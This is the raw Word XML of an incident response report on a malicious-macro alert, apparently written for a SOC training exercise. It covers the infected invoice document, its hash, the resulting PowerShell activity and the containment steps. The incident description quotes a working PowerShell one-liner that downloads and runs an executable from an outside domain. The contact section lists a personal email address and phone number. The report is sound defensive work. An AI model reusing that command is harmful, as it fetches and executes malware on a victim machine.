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62FA" w14:textId="70A8C293" w:rsidR="006332C1" w:rsidRDefault="006332C1" w:rsidP="006332C1">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Century Gothic" w:hAnsi="Century Gothic"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="RANGE!B1:M57"/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4"/>
        <w:gridCol w:w="432"/>
        <w:gridCol w:w="5184"/>
      </w:tblGrid>
      <w:tr w:rsidR="00604657" w:rsidRPr="00144557" w14:paraId="5E80F0B7" w14:textId="77777777" w:rsidTr="00604657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797D7F13" w14:textId="0EAB5FAE" w:rsidR="00604657" w:rsidRPr="008D2C63" w:rsidRDefault="00604657" w:rsidP="003C72C2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Contact Person</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00604657" w:rsidRPr="00144557" w14:paraId="59BD6DDB" w14:textId="77777777" w:rsidTr="00604657">
        <w:trPr>
          <w:trHeight w:val="317"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5274" w:type="dxa"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w14:paraId="139F7D37" w14:textId="4F33B8A1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Full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ame</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="432" w:type="dxa"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w14:paraId="68936D90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vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w14:paraId="7ADF0B3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Job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itle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r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ole</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00604657" w:rsidRPr="00144557" w14:paraId="702A550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32C4B97" w14:textId="784CC9BE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432" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="655CC24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2974477" w14:textId="5A1A570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Incident Response Analyst</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00604657" w:rsidRPr="00144557" w14:paraId="72D48647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230DF366" w14:textId="613E57AA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Department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eam</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="432" w:type="dxa"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w14:paraId="693F4686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3B8184E8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Email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a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ddress</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00604657" w:rsidRPr="00144557" w14:paraId="0AC526DC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30555E" w14:textId="40998182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Security Operations Center (SOC)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="432" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7F47CF7C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0EFCE2C" w14:textId="75071D8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Ahmed.em.nasr@gmail.com</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00604657" w:rsidRPr="00144557" w14:paraId="31F19AC1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4870743B" w14:textId="151D76B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Phone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umber</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="432" w:type="dxa"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w14:paraId="1D27C427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199CDDB1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604657" w:rsidRPr="00144557" w14:paraId="3F8B5A3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CCAB495" w14:textId="765C1819" w:rsidR="00604657" w:rsidRPr="00144557" w:rsidRDefault="000F7446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+201018166445</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="432" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="277E832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vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3B79825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73B1725E" w14:textId="260E519A" w:rsidR="00604657" w:rsidRPr="00EE21BE" w:rsidRDefault="00604657" w:rsidP="006332C1">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Century Gothic" w:hAnsi="Century Gothic"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16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9"/>
        <w:gridCol w:w="2383"/>
        <w:gridCol w:w="1462"/>
        <w:gridCol w:w="4621"/>
      </w:tblGrid>
      <w:tr w:rsidR="006332C1" w:rsidRPr="00144557" w14:paraId="32E42FD0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D9FB4B4" w14:textId="77777777" w:rsidR="006332C1" w:rsidRPr="008D2C63" w:rsidRDefault="006332C1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The Incident</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008D2C63" w:rsidRPr="008D2C63" w14:paraId="7B909926" w14:textId="77777777" w:rsidTr="00EE21BE">
        <w:trPr>
          <w:trHeight w:val="317"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10890" w:type="dxa"/>
            <w:gridSpan w:val="4"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w14:paraId="22E663D5" w14:textId="3060190A" w:rsidR="00183426" w:rsidRPr="008D2C63" w:rsidRDefault="00183426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Date and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t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ime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d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iscovered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8D2C63" w:rsidRPr="008D2C63" w14:paraId="5EBE7B61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DB7C99E" w14:textId="2AEB5DF7" w:rsidR="00183426" w:rsidRPr="008D2C63" w:rsidRDefault="00EA7A80" w:rsidP="00EA7A80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EA7A80">
              <w:rPr>
                <w:rFonts w:ascii="Century Gothic" w:hAnsi="Century Gothic"/>
                <w:color w:val="auto"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Feb, 28, 2024, 08:42 AM.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008D2C63" w:rsidRPr="008D2C63" w14:paraId="4D99A05E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4C900EEE" w14:textId="28F7245D" w:rsidR="006332C1" w:rsidRPr="008D2C63" w:rsidRDefault="0063207C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How was the incident detected? (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E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.g., user report, monitoring system alert)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008D2C63" w:rsidRPr="008D2C63" w14:paraId="2F140D7A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9AA232C" w14:textId="3998BBB1" w:rsidR="006332C1" w:rsidRPr="008D2C63" w:rsidRDefault="00EA7A80" w:rsidP="00EA7A80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EA7A80">
              <w:rPr>
                <w:rFonts w:ascii="Century Gothic" w:hAnsi="Century Gothic"/>
                <w:color w:val="auto"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>A Medium severity alert was triggered in the Monitoring system under the rule "SOC205 - Malicious Macro has been executed".</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0063207C" w:rsidRPr="00144557" w14:paraId="75D7F04B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7A71ABC7" w14:textId="71AD6A20" w:rsidR="0063207C" w:rsidRPr="008D2C63" w:rsidRDefault="0063207C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Detailed description of the incident (include what occurred, where, and how)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144557" w14:paraId="0E092E49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CB88236" w14:textId="77777777" w:rsidR="00EA7A80" w:rsidRPr="00EA7A80" w:rsidRDefault="00EA7A80" w:rsidP="00EA7A80">
            <w:pPr>
              <w:pStyle w:val="p1"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="8"/>
              </w:numPr>
              <w:rPr>
                <w:rFonts w:ascii="Century Gothic" w:hAnsi="Century Gothic"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00EA7A80">
              <w:rPr>
                <w:rFonts w:ascii="Century Gothic" w:hAnsi="Century Gothic"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>A compressed archive named edit1-invoice.docm.zip was downloaded to the workstation Jayne (IP: 172.16.17.198), and the file edit1-invoice.docm was extracted at 08:41 AM.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3D681E92" w14:textId="77777777" w:rsidR="00EA7A80" w:rsidRPr="00EA7A80" w:rsidRDefault="00EA7A80" w:rsidP="00EA7A80">
            <w:pPr>
              <w:pStyle w:val="p1"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="8"/>
              </w:numPr>
              <w:rPr>
                <w:rFonts w:ascii="Century Gothic" w:hAnsi="Century Gothic"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00EA7A80">
              <w:rPr>
                <w:rFonts w:ascii="Century Gothic" w:hAnsi="Century Gothic"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>VirusTotal analysis of the document's hash (1a819d18c9a9de4f81829c4cd55a17f767443c22f9b30ca953866827e5d96fb0) shows 26 out of 56 vendors flagging it as malicious (TrojanDownloader).</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5E698F6B" w14:textId="77777777" w:rsidR="00EA7A80" w:rsidRPr="00EA7A80" w:rsidRDefault="00EA7A80" w:rsidP="00EA7A80">
            <w:pPr>
              <w:pStyle w:val="p1"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="8"/>
              </w:numPr>
              <w:rPr>
                <w:rFonts w:ascii="Century Gothic" w:hAnsi="Century Gothic"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00EA7A80">
              <w:rPr>
                <w:rFonts w:ascii="Century Gothic" w:hAnsi="Century Gothic"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Code insights reveal the document contains a macro in ThisDocument.cls designed to execute a hidden shell command when a specific InkEdit control receives focus, bypassing explicit user interaction beyond enabling macros.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="12AFE78C" w14:textId="77777777" w:rsidR="00EA7A80" w:rsidRPr="00EA7A80" w:rsidRDefault="00EA7A80" w:rsidP="00EA7A80">
            <w:pPr>
              <w:pStyle w:val="p1"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="8"/>
              </w:numPr>
              <w:rPr>
                <w:rFonts w:ascii="Century Gothic" w:hAnsi="Century Gothic"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00EA7A80">
              <w:rPr>
                <w:rFonts w:ascii="Century Gothic" w:hAnsi="Century Gothic"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Log Management events show that WINWORD.EXE opened the malicious document.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="01529A03" w14:textId="77777777" w:rsidR="00EA7A80" w:rsidRPr="00EA7A80" w:rsidRDefault="00EA7A80" w:rsidP="00EA7A80">
            <w:pPr>
              <w:pStyle w:val="p1"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="8"/>
              </w:numPr>
              <w:rPr>
                <w:rFonts w:ascii="Century Gothic" w:hAnsi="Century Gothic"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00EA7A80">
              <w:rPr>
                <w:rFonts w:ascii="Century Gothic" w:hAnsi="Century Gothic"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Following the macro execution, a new PowerShell process was spawned (EventID 4688) with a command line instructing it to download a payload using System.Net.WebClient.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="58EB28C0" w14:textId="77777777" w:rsidR="00EA7A80" w:rsidRPr="00EA7A80" w:rsidRDefault="00EA7A80" w:rsidP="00EA7A80">
            <w:pPr>
              <w:pStyle w:val="p1"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="8"/>
              </w:numPr>
              <w:rPr>
                <w:rFonts w:ascii="Century Gothic" w:hAnsi="Century Gothic"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00EA7A80">
              <w:rPr>
                <w:rFonts w:ascii="Century Gothic" w:hAnsi="Century Gothic"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>The malicious script block executed the following: (New-Object System.Net.WebClient).DownloadFile('http://www.greyhathacker.net/tools/messbox.exe','mess.exe');Start-Process 'mess.exe'.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="782A68F3" w14:textId="6782CADE" w:rsidR="0063207C" w:rsidRPr="00EA7A80" w:rsidRDefault="00EA7A80" w:rsidP="00EA7A80">
            <w:pPr>
              <w:pStyle w:val="p1"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="8"/>
              </w:numPr>
              <w:rPr>
                <w:rFonts w:ascii="Century Gothic" w:hAnsi="Century Gothic"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00EA7A80">
              <w:rPr>
                <w:rFonts w:ascii="Century Gothic" w:hAnsi="Century Gothic"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>A DNS Query (EventID 22) confirms that powershell.exe successfully resolved WWW.GREYHATHACKER.NET at 08:42 AM.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00067ADF" w:rsidRPr="00144557" w14:paraId="18B775E0" w14:textId="77777777" w:rsidTr="00EE21BE">
        <w:trPr>
          <w:trHeight w:val="317"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="59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1A604F3C" w14:textId="7008CEFA" w:rsidR="00067ADF" w:rsidRPr="008D2C63" w:rsidRDefault="00067ADF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Was the incident ongoing at the time of report?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4950" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="A6A6A6" w:themeColor="background1" w:themeShade="A6"/>
            </w:tcBorders>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w14:paraId="71C47488" w14:textId="3980B9AF" w:rsidR="00067ADF" w:rsidRPr="008D2C63" w:rsidRDefault="00067ADF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</w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00803118" w:rsidRPr="00144557" w14:paraId="6C074C65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2E4B0DE2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60597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8D2C63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10605CDD" w14:textId="62D75D32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1247878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A7A80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5BD741E1" w14:textId="77777777" w:rsidR="00803118" w:rsidRPr="008D2C63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067ADF" w:rsidRPr="00144557" w14:paraId="494862E4" w14:textId="77777777" w:rsidTr="000077E5">
        <w:trPr>
          <w:trHeight w:val="317"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5940" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w14:paraId="1B135C0D" w14:textId="0F6B6755" w:rsidR="00067ADF" w:rsidRPr="008D2C63" w:rsidRDefault="00067ADF" w:rsidP="00067ADF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</w:rPr>
              <w:t>Have any files, accounts, or systems been compromised?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4950" w:type="dxa"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w14:paraId="4B48F769" w14:textId="3FC8F2B2" w:rsidR="00067ADF" w:rsidRPr="008D2C63" w:rsidRDefault="00067ADF" w:rsidP="00067ADF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</w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00803118" w:rsidRPr="00144557" w14:paraId="07C4B709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0562B383" w14:textId="71A5FA4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500765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A7A80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368D53F9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401093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8D2C6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66DB57D0" w14:textId="77777777" w:rsidR="00803118" w:rsidRPr="008D2C63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3207C" w:rsidRPr="00144557" w14:paraId="2D1A7993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FE8B2A6" w14:textId="3CDD70C8" w:rsidR="0063207C" w:rsidRPr="008D2C63" w:rsidRDefault="0063207C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If yes, please describe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144557" w14:paraId="5EC1CBA7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BB6CC20" w14:textId="28FC1BC4" w:rsidR="0063207C" w:rsidRPr="008D2C63" w:rsidRDefault="00EA7A80" w:rsidP="00EA7A80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EA7A80">
              <w:rPr>
                <w:rFonts w:ascii="Century Gothic" w:hAnsi="Century Gothic"/>
                <w:color w:val="auto"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>The host Jayne (172.16.17.198) is compromised. The malicious macro successfully executed, invoked PowerShell, and attempted to download and execute a secondary payload (messbox.exe) from an external attacker-controlled domain.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4BB22486" w14:textId="11470A31" w:rsidR="0063207C" w:rsidRPr="00523BAA" w:rsidRDefault="0063207C" w:rsidP="006332C1">
      <w:pPr>
        <w:spacing w:after="0"/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5"/>
        <w:gridCol w:w="1490"/>
        <w:gridCol w:w="270"/>
        <w:gridCol w:w="355"/>
        <w:gridCol w:w="270"/>
        <w:gridCol w:w="6300"/>
      </w:tblGrid>
      <w:tr w:rsidR="006332C1" w:rsidRPr="00144557" w14:paraId="579185B6" w14:textId="77777777" w:rsidTr="000077E5">
        <w:trPr>
          <w:trHeight w:val="432"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10890" w:type="dxa"/>
            <w:gridSpan w:val="6"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EB6E19"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="08D46774" w14:textId="7D63119A" w:rsidR="006332C1" w:rsidRPr="00144557" w:rsidRDefault="009D733E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1F4E79" w:themeColor="accent5" w:themeShade="80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Notification</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00803118" w:rsidRPr="00144557" w14:paraId="44583CE2" w14:textId="77777777" w:rsidTr="001312FE">
        <w:trPr>
          <w:trHeight w:val="317"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4320" w:type="dxa"/>
            <w:gridSpan w:val="4"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w14:paraId="03C01F44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your supervisor or manager notified?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="270" w:type="dxa"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w14:paraId="7C7C1797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300" w:type="dxa"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w14:paraId="3FA1FC48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Date/time of notification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803118" w:rsidRPr="00144557" w14:paraId="69469BFC" w14:textId="77777777" w:rsidTr="001312FE">
        <w:trPr>
          <w:trHeight w:val="360"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2205" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="08248511" w14:textId="167111FF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26129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A7A80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490" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7C11A448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831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895" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4BD84675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6300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313CA59" w14:textId="30B0ABCC" w:rsidR="00803118" w:rsidRPr="00144557" w:rsidRDefault="00EA7A80" w:rsidP="00EA7A80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EA7A80">
              <w:rPr>
                <w:rFonts w:ascii="Century Gothic" w:hAnsi="Century Gothic"/>
                <w:color w:val="auto"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">April </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Century Gothic" w:hAnsi="Century Gothic"/>
                <w:color w:val="auto"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>6</w:t>
            </w:r>
            <w:r w:rsidRPr="00EA7A80">
              <w:rPr>
                <w:rFonts w:ascii="Century Gothic" w:hAnsi="Century Gothic"/>
                <w:color w:val="auto"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>, 2026</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00803118" w:rsidRPr="00144557" w14:paraId="578F8E08" w14:textId="77777777" w:rsidTr="001312FE">
        <w:trPr>
          <w:trHeight w:val="317"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3695" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w14:paraId="54DB02B7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 IT/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s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ecurity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eam alerted?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="270" w:type="dxa"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w14:paraId="7103FD18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925" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w14:paraId="41118106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If yes, who was contacted and how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?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 (e.g., email, phone, ticket)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00803118" w:rsidRPr="00144557" w14:paraId="5321B958" w14:textId="77777777" w:rsidTr="001312FE">
        <w:trPr>
          <w:trHeight w:val="360"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2205" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3948B45B" w14:textId="2966E29B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846704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A7A80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490" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="353BCCAB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266338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270" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="52278C25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6925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3840FB" w14:textId="3FC0FB12" w:rsidR="00803118" w:rsidRPr="00144557" w:rsidRDefault="00EA7A80" w:rsidP="00EA7A80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EA7A80">
              <w:rPr>
                <w:rFonts w:ascii="Century Gothic" w:hAnsi="Century Gothic"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="auto"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>If yes, who was contacted and how? (e.g., email, phone, ticket):</w:t>
            </w:r>
            <w:r w:rsidRPr="00EA7A80">
              <w:rPr>
                <w:rFonts w:ascii="Century Gothic" w:hAnsi="Century Gothic"/>
                <w:color w:val="auto"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> Escalated to the Incident Response team via Case Management for host isolation and forensic review.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="61277E03" w14:textId="77777777" w:rsidR="0073457C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5A6C0519" w14:textId="77777777" w:rsidR="0073457C" w:rsidRPr="00523BAA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890"/>
        <w:gridCol w:w="3865"/>
        <w:gridCol w:w="3150"/>
      </w:tblGrid>
      <w:tr w:rsidR="0016120B" w:rsidRPr="0016120B" w14:paraId="2A3D05DC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92A63A2" w14:textId="7E7DD2C3" w:rsidR="009D733E" w:rsidRPr="0016120B" w:rsidRDefault="009D733E" w:rsidP="009D733E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Containment Measures</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009D733E" w:rsidRPr="00144557" w14:paraId="539BE59C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3336AD1C" w14:textId="08E8182D" w:rsidR="009D733E" w:rsidRPr="00144557" w:rsidRDefault="009D733E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What immediate actions were taken to contain the threat? (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.g., system shutdown, network isolation)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009D733E" w:rsidRPr="00144557" w14:paraId="71BEE25A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EC474BB" w14:textId="7B2E6605" w:rsidR="009D733E" w:rsidRPr="00144557" w:rsidRDefault="00EA7A80" w:rsidP="00EA7A80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EA7A80">
              <w:rPr>
                <w:rFonts w:ascii="Century Gothic" w:hAnsi="Century Gothic"/>
                <w:color w:val="auto"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>mmediately isolate the host Jayne (172.16.17.198) using Endpoint Security controls to prevent the secondary payload (mess.exe) from establishing command and control (C2) or moving laterally.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006C149F" w:rsidRPr="00144557" w14:paraId="6EF550E5" w14:textId="77777777" w:rsidTr="00EE21BE">
        <w:trPr>
          <w:trHeight w:val="317"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="77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655C2DEF" w14:textId="5EB49E7F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Were any user accounts disabled, firewalls updated, or services suspended?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3150" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="A6A6A6" w:themeColor="background1" w:themeShade="A6"/>
            </w:tcBorders>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w14:paraId="1C5B205D" w14:textId="77777777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803118" w:rsidRPr="00144557" w14:paraId="2A0920B8" w14:textId="77777777" w:rsidTr="001312FE">
        <w:trPr>
          <w:trHeight w:val="360"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1985" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2C2E5F97" w14:textId="5CC8A9A4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2045292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A7A80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890" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0A15E9C4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715545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7015" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="05B5C9BE" w14:textId="77777777" w:rsidR="00803118" w:rsidRPr="00144557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C149F" w:rsidRPr="00144557" w14:paraId="7B8979D4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6713BEBE" w14:textId="4AF437D6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If yes, provide details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6C149F" w:rsidRPr="00144557" w14:paraId="622F7B6F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2BBD821" w14:textId="793B9F6A" w:rsidR="00EA7A80" w:rsidRPr="00EA7A80" w:rsidRDefault="00EA7A80" w:rsidP="00EA7A80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EA7A80">
              <w:rPr>
                <w:rFonts w:ascii="Century Gothic" w:hAnsi="Century Gothic"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> Firewalls and web proxies updated to block the domain www.greyhathacker.net and its associated IP addresses.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3B5F451A" w14:textId="5FDFFD20" w:rsidR="00EA7A80" w:rsidRPr="00EA7A80" w:rsidRDefault="00EA7A80" w:rsidP="00EA7A80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EA7A80">
              <w:rPr>
                <w:rFonts w:ascii="Century Gothic" w:hAnsi="Century Gothic"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> The file hash for edit1-invoice.docm and the anticipated payload messbox.exe have been blacklisted in the EDR solution.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6413AF0D" w14:textId="77777777" w:rsidR="006C149F" w:rsidRPr="00144557" w:rsidRDefault="006C149F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5F5141D9" w14:textId="328BD8C6" w:rsidR="00EE21BE" w:rsidRDefault="00EE21BE" w:rsidP="00EE21BE">
      <w:pPr>
        <w:spacing w:after="0"/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0"/>
        <w:gridCol w:w="1900"/>
        <w:gridCol w:w="1265"/>
        <w:gridCol w:w="5755"/>
      </w:tblGrid>
      <w:tr w:rsidR="0016120B" w:rsidRPr="0016120B" w14:paraId="5BFC374F" w14:textId="77777777" w:rsidTr="00EE21BE">
        <w:trPr>
          <w:trHeight w:val="432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shd w:val="clear" w:color="auto" w:fill="EB6E19"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="246F46CF" w14:textId="5D5FA642" w:rsidR="001E5037" w:rsidRPr="0016120B" w:rsidRDefault="001E5037" w:rsidP="001E503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Impacted Services Measures</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001E5037" w:rsidRPr="00144557" w14:paraId="147F7770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75E2AFCE" w14:textId="6024AE31" w:rsidR="001E5037" w:rsidRPr="00144557" w:rsidRDefault="001E5037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List any systems, devices, or applications affected by the incident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144557" w14:paraId="505D20B9" w14:textId="77777777" w:rsidTr="00EE21BE">
        <w:trPr>
          <w:trHeight w:val="864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15B211" w14:textId="1490862E" w:rsidR="001E5037" w:rsidRPr="00144557" w:rsidRDefault="00EA7A80" w:rsidP="00EA7A80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EA7A80">
              <w:rPr>
                <w:rFonts w:ascii="Century Gothic" w:hAnsi="Century Gothic"/>
                <w:color w:val="auto"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Workstation Hostname: Jayne (IP: 172.16.17.198)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001E5037" w:rsidRPr="00144557" w14:paraId="6A253ABF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vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w14:paraId="40431FBC" w14:textId="7A3B6CE2" w:rsidR="001E5037" w:rsidRPr="00144557" w:rsidRDefault="001E5037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Estimated number of affected users, if applicable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144557" w14:paraId="3F676559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14BAE38" w14:textId="5ADED754" w:rsidR="001E5037" w:rsidRPr="00144557" w:rsidRDefault="00EA7A80" w:rsidP="00EA7A80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EA7A80">
              <w:rPr>
